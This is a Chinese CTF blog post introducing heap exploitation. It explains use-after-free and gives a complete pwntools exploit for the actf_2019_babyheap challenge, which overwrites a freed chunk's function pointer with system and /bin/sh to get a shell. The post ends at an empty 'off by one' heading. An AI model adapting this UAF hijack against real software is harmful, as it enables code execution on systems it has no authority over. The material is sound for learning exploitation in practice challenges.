

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="vstral">
  <meta name="keywords" content="pwn,vstral,ctf,computer,security,二进制,网络安全">
  
    <meta name="description" content="找到他们的目录，然后在pwn题目文件目录下运行以下两条命令: 12345678patchelf --set-interpreter 。&#x2F;ld-linux-x86-64.so.2 .&#x2F;pwn patchelf --add-needed 你的文件目录&#x2F;libc.so.6 .&#x2F;pwn patchelf --add-needed 你的目录&#x2F;libpthread.so.0 .&#x2F;pwn （如果提示没有libp">
<meta property="og:type" content="article">
<meta property="og:title" content="堆入门学习之路">
<meta property="og:url" content="https://vstralcn.github.io/2025/03/25/%E5%A0%86%E5%85%A5%E9%97%A8%E5%AD%A6%E4%B9%A0%E4%B9%8B%E8%B7%AF/index.html">
<meta property="og:site_name" content="vstral blog">
<meta property="og:description" content="找到他们的目录，然后在pwn题目文件目录下运行以下两条命令: 12345678patchelf --set-interpreter 。&#x2F;ld-linux-x86-64.so.2 .&#x2F;pwn patchelf --add-needed 你的文件目录&#x2F;libc.so.6 .&#x2F;pwn patchelf --add-needed 你的目录&#x2F;libpthread.so.0 .&#x2F;pwn （如果提示没有libp">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/vstralcn/image/main/image-20250326215158284.png">
<meta property="og:image" content="https://raw.githubusercontent.com/vstralcn/image/main/image-20250326215552620.png">
<meta property="og:image" content="https://raw.githubusercontent.com/vstralcn/image/main/image-20250326215744679.png">
<meta property="article:published_time" content="2025-03-25T13:10:43.000Z">
<meta property="article:modified_time" content="2025-03-27T02:41:45.598Z">
<meta property="article:author" content="vstral">
<meta property="article:tag" content="heap">
<meta property="article:tag" content="堆">
<meta property="article:tag" content="入门">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://raw.githubusercontent.com/vstralcn/image/main/image-20250326215158284.png">
  
  
  
  <title>堆入门学习之路 - vstral blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"vstralcn.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>vstral blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="堆入门学习之路"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-03-25 21:10" pubdate>
          2025年3月25日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          615 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          6 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">堆入门学习之路</h1>
            
            
              <div class="markdown-body">
                
                <p>找到他们的目录，然后在pwn题目文件目录下运行以下两条命令:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">patchelf --set-interpreter 。/ld-linux-x86-64.so.2 ./pwn<br> <br>patchelf --add-needed 你的文件目录/libc.so.6 ./pwn<br> <br>patchelf --add-needed 你的目录/libpthread.so.0 ./pwn （如果提示没有libpthread.so.0的话）<br> <br><span class="hljs-comment">#后来发现最好的命令、</span><br>patchelf --set-rpath 你的文件目录/ld-linux-x86-64.so.2 ./pwn<br></code></pre></td></tr></table></figure>



<h1 id="一、UAF"><a href="#一、UAF" class="headerlink" title="一、UAF"></a>一、UAF</h1><p>UAF即use after free，就是在程序使用malloc申请了内存并且写入了数据之后，通过free释放了堆块，但是没有清除数据，导致再次申请malloc时再次分配到这块内存，里面的数据被复用。（再次申请的堆块比之前申请的小）</p>
<h2 id="例题：actf-2019-babyheap"><a href="#例题：actf-2019-babyheap" class="headerlink" title="例题：actf_2019_babyheap"></a>例题：actf_2019_babyheap</h2><p>先对函数名称进行一下简单的修复</p>
<p><img src="https://raw.githubusercontent.com/vstralcn/image/main/image-20250326215158284.png" srcset="/img/loading.gif" lazyload alt="image-20250326215158284"></p>
<p><img src="https://raw.githubusercontent.com/vstralcn/image/main/image-20250326215552620.png" srcset="/img/loading.gif" lazyload alt="image-20250326215552620"></p>
<p>可以发现print输出函数的地址被存到了chunk里面</p>
<p><img src="https://raw.githubusercontent.com/vstralcn/image/main/image-20250326215744679.png" srcset="/img/loading.gif" lazyload alt="image-20250326215744679"></p>
<p>在输出函数中，可以看到是利用chunk中保存的函数指针和数据来打印的，而且程序中有system函数和binsh字符串，所以可以利用起来，所以我们可以先分配3个堆块，然后释放堆块，因为重新分配相同大小的堆块时，会优先分配之前释放的内存区域，当我们生成0x10大小的堆块时，首先会生成一个0x10的函数块，然后是0x10的数据块，因为这两个都是0x10，所以就会再次分配到之前的两个堆块的位置，当我们在第二个堆块写入伪造的函数指针时，使用print第二个堆块，就会调用我们伪造的函数指针。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>file = <span class="hljs-string">&#x27;./ACTF_2019_babyheap&#x27;</span><br>i = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> i == <span class="hljs-number">1</span>:<br>    io = process(file)<br><span class="hljs-keyword">else</span>:<br>    io = remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">27160</span>)<br>elf = ELF(file)<br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>sd = <span class="hljs-keyword">lambda</span> s : io.send(s)<br>sl = <span class="hljs-keyword">lambda</span> s : io.sendline(s)<br>sa = <span class="hljs-keyword">lambda</span> n,s : io.sendafter(n,s)<br>sla = <span class="hljs-keyword">lambda</span> n,s : io.sendlineafter(n,s)<br>rc = <span class="hljs-keyword">lambda</span> n : io.recv(n)<br>rl = <span class="hljs-keyword">lambda</span> : io.recvline()<br>ru = <span class="hljs-keyword">lambda</span> s : io.recvuntil(s)<br>ra = <span class="hljs-keyword">lambda</span> : io.recvall()<br>it = <span class="hljs-keyword">lambda</span> : io.interactive()<br><span class="hljs-comment">#gdb.attach(io)</span><br><span class="hljs-comment">#---------- EXP ----------</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Create</span>(<span class="hljs-params">size,data</span>):<br>    sa(<span class="hljs-string">b&#x27;Your choice: &#x27;</span>,<span class="hljs-string">b&#x27;1&#x27;</span>)<br>    sa(<span class="hljs-string">b&#x27;Please input size: \n&#x27;</span>,size)<br>    sa(<span class="hljs-string">b&#x27;Please input content: \n&#x27;</span>,data)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Delete</span>(<span class="hljs-params">index</span>):<br>    sla(<span class="hljs-string">b&#x27;Your choice: &#x27;</span>,<span class="hljs-string">b&#x27;2&#x27;</span>)<br>    sla(<span class="hljs-string">b&#x27;Please input list index: \n&#x27;</span>,index)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Print</span>(<span class="hljs-params">index</span>):<br>    sla(<span class="hljs-string">b&#x27;Your choice: &#x27;</span>,<span class="hljs-string">b&#x27;3&#x27;</span>)<br>    sla(<span class="hljs-string">b&#x27;Please input list index: \n&#x27;</span>,index)<br><br>Create(<span class="hljs-string">b&#x27;128&#x27;</span>,<span class="hljs-string">b&#x27;aaaa&#x27;</span>)<br>Create(<span class="hljs-string">b&#x27;128&#x27;</span>,<span class="hljs-string">b&#x27;bbbb&#x27;</span>)<br>Create(<span class="hljs-string">b&#x27;128&#x27;</span>,<span class="hljs-string">b&#x27;cccc&#x27;</span>)<br><br><br>system = elf.plt[<span class="hljs-string">&#x27;system&#x27;</span>]<br>binsh = <span class="hljs-number">0x602010</span><br><br>pause()<br>Delete(<span class="hljs-string">b&#x27;1&#x27;</span>)<br>Delete(<span class="hljs-string">b&#x27;0&#x27;</span>)<br><br>Create(<span class="hljs-string">b&#x27;16&#x27;</span>,p64(binsh) + p64(system))<br>gdb.attach(io)<br>Print(<span class="hljs-string">b&#x27;1&#x27;</span>)<br><br>it()<br></code></pre></td></tr></table></figure>



<h1 id="二、off-by-one"><a href="#二、off-by-one" class="headerlink" title="二、off by one"></a>二、off by one</h1>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/heap/" class="print-no-link">#heap</a>
      
        <a href="/tags/%E5%A0%86/" class="print-no-link">#堆</a>
      
        <a href="/tags/%E5%85%A5%E9%97%A8/" class="print-no-link">#入门</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>堆入门学习之路</div>
      <div>https://vstralcn.github.io/2025/03/25/堆入门学习之路/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>vstral</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年3月25日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/03/18/Docker%E4%B8%AD%E9%85%8D%E7%BD%AEubuntu16-04%E7%8E%AF%E5%A2%83/" title="Docker中配置ubuntu16.04环境">
                        <span class="hidden-mobile">Docker中配置ubuntu16.04环境</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
